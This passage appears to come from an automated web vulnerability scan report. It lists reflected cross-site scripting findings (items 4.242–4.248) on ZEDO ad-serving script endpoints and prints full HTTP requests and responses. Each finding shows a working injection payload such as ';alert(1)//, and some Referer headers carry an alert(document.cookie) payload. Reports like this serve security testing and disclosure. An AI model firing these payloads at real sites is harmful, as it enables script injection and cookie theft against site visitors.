Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=44
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:06 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='b0c81';alert(1)//d0aa9fd4ab0';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=b0c81';alert(1)//d0aa9fd4ab0;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.242. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b513f"%3balert(1)//a126b16dd12 was submitted in the q parameter. This input was echoed as b513f";alert(1)//a126b16dd12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=b513f"%3balert(1)//a126b16dd12&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=44
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:06 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='b513f";alert(1)//a126b16dd12';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=b513f";alert(1)//a126b16dd12;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=126;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

4.243. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 976a8'%3balert(1)//8b6cb345271 was submitted in the $ parameter. This input was echoed as 976a8';alert(1)//8b6cb345271 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=976a8'%3balert(1)//8b6cb345271&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:976a8';alert(1)//8b6cb345271;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=41
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:09 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat=',976a8';alert(1)//8b6cb345271';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,976a8';alert(1)//8b6cb345271;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.244. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e06"%3balert(1)//3fda4fef972 was submitted in the $ parameter. This input was echoed as 41e06";alert(1)//3fda4fef972 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=41e06"%3balert(1)//3fda4fef972&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:41e06";alert(1)//3fda4fef972;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=42
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:08 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat=',41e06";alert(1)//3fda4fef972';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,41e06";alert(1)//3fda4fef972;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math.
...[SNIP]...

4.245. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 132e9'%3balert(1)//cb504a93756 was submitted in the l parameter. This input was echoed as 132e9';alert(1)//cb504a93756 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/132e9'%3balert(1)//cb504a93756&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:13 GMT
Connection: close
Content-Length: 1900

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCu
...[SNIP]...
DYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/132e9';alert(1)//cb504a93756">
...[SNIP]...

4.246. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b427'-alert(1)-'52c0c108d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?2b427'-alert(1)-'52c0c108d3d=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 986
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=552
Expires: Fri, 28 Jan 2011 16:54:00 GMT
Date: Fri, 28 Jan 2011 16:44:48 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fmr.js;qs=2b427'-alert(1)-'52c0c108d3d=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

4.247. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dd9d'%3balert(1)//443920a6ea7 was submitted in the q parameter. This input was echoed as 6dd9d';alert(1)//443920a6ea7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=6dd9d'%3balert(1)//443920a6ea7&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=43
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:07 GMT
Connection: close
Content-Length: 1928

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='6dd9d';alert(1)//443920a6ea7';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=6dd9d';alert(1)//443920a6ea7;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.248. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8120d"%3balert(1)//0d14a65187a was submitted in the q parameter. This input was echoed as 8120d";alert(1)//0d14a65187a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=8120d"%3balert(1)//0d14a65187a&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
